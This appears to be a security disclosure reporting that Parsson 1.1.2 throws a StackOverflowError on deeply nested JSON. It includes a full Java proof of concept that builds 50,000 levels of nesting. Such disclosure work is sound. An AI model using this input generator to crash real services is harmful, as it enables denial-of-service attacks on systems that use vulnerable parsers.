parsson: stack overflow when parsing deeply nested input

I'm a contributor to Jackson and we've been getting a lot of people raising issues, expecting that Jackson handles malicious inputs in a graceful way.

I will add a test case at the bottom of this email that demonstrates a very deeply nested JSON input will make Parsson 1.1.2 throw a StackOverflowError. It is based on a jackson-core test.

Get back to me if you want more details.

Steps to reproduce

import jakarta.json.Json;
import jakarta.json.stream.JsonParser;

import java.io.StringReader;

public class Main {
    public static void main(String[] args) {
        try {
            String json = createDeepNestedDoc(50000);
            try (JsonParser parser = Json.createParser(new StringReader(json))) {
                while (parser.hasNext()) {
                    JsonParser.Event ev = parser.next();
                    if (ev.name().equals("START_ARRAY")) {
                        parser.getArray();
                    }
                }
            }
        } catch (Throwable t) {
            t.printStackTrace();
        }
    }

    private static String createDeepNestedDoc(final int depth) {
        StringBuilder sb = new StringBuilder();
        sb.append("[");
        for (int i = 0; i < depth; i++) {
            sb.append("{ \"a\": [");
        }
        sb.append(" \"val\" ");
        for (int i = 0; i < depth; i++) {
            sb.append("]}");
        }
        sb.append("]");
        return sb.toString();
    }
}

What are the affected versions?

not defined

Do you know any mitigations of the issue?

not defined

Copyright © Eclipse Foundation AISBL. All rights reserved.     Privacy Policy | Terms of Use | Copyright Agent